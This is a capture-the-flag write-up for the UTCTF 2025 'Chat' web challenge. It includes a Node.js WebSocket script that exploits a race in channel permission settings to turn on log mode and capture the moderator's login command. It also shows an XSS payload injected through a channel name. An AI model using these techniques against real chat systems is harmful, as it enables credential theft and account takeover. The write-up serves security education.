Post

Chat

A chat server with some 'interesting' features! I wonder how many of them are secure... (Send /help to get started.) By Alex (.alex_._ on discord) http://challenge.utctf.live:5213

Posted
By Dimitrie-Toma Furdui
1 min read

First, we need to register:

There are 3 default channels. We can send messages:

/help reveals other useful commands. Notice that the website communicates with the server via WebSockets.

The target is to log in as a moderator. The moderator periodically announces the time:

There is also an XSS unrelated to the exploit path. The onclick handler for the channel list (which joins a channel when clicked) can be exploited to run arbitrary JavaScript.

A channel like ');alert(1)// triggers the exploit when clicked, as the HTML looks like this:

But, again, this is unrelated.

We have some interesting commands: we can change the CSS of the username (which will be reflected for everyone in the chat), but it’s not relevant. We also have the /set command which can set multiple properties:

channel.mode can either be normal (default) or log, which seems like an interesting attack path. However, setting it to log requires setting the channel to hidden and admin-only. We are not admins, so if we set it to admin-only we cannot access the channel anymore. Furthermore, setting it to admin-only forcibly closes our WebSocket connection.

However, WebSocket messages are sent asynchronously. What if we could make a channel log, then remove the admin-only property immediately after, before the WebSocket connection is closed?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

const ws = new WebSocket("ws://challenge.utctf.live:5213/socket", {
    headers: {
        Cookie: "web-chat-userid=PMDqpEyuUTYr8jhP7W5kUsbuvKPALTw8lHvQwTAAAeN9BssRFSvqL0OftUCMzQY%3D"
    }
});
ws.addEventListener("open", open);
ws.addEventListener("message", message);

function message(message) {
    console.log(message.data);
}

function open() {
    const channelName = `channelABCDE`;
    ws.send(`/create ${channelName}`);
    ws.send(`/join ${channelName}`);
    ws.send("/set channel.hidden true");
    ws.send("/set channel.admin-only true");
    ws.send("/set channel.mode log");
    ws.send("/set channel.admin-only false");
}

The exploit worked: we get two messages that the admin-only property has been updated:

We can /join the channel in the UI. On log channels we receive any command run by any user, including the moderator’s login!

We just need to log in as the moderator, join mod-info and view the channel details with /channel to get the flag:

ctf, UTCTF 2025
web
This post is licensed under CC BY 4.0 by the author.